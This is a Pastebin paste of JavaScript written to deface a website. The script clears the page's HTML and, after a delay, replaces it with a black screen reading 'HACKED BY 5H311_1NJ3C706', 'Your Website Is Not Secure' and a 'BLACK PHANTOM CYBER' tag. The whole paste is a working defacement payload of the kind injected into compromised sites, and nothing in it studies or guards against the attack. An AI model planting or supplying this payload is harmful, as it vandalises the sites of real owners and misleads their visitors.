Cracker86

Untitled

Mar 14th, 2019
166
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.77 KB | None | 0 0
  1. var js_html = document.getElementsByTagName('html')[0];
  2. js_html.innerHTML = '';
  3. document.title='HACKED BY 5H311_1NJ3C706';
  4.  
  5. setTimeout("js_view()", 3000);
  6.  
  7. function js_view() {
  8. js_html.innerHTML = "" +
  9. "<table width='100%' height='100%'>" +
  10. "<tr valign='middle'>" +
  11. "<td align='center'>" +
  12. "<h1>" +
  13. "<font color='lime'>HACKED BY 5H311_1NJ3C706</font>" +
  14. "</h1>" +
  15. "<div style='color: white;'>" +
  16. "<br>Your Website Is Not Secure" +
  17. "<br>I came here just to test your website security" +
  18. "<br><br><br>" +
  19. "<span style='color: red; font-weight: bold;'>~~| BLACK PHANTOM CYBER |~~</span>" +
  20. "</div>" +
  21. "</td>" +
  22. "</table>";
  23. js_html.style.backgroundColor = "black";
  24. js_html.style.fontFamily = "monospace, consolas";
  25. }
Advertisement
Add Comment
Please, Sign In to add comment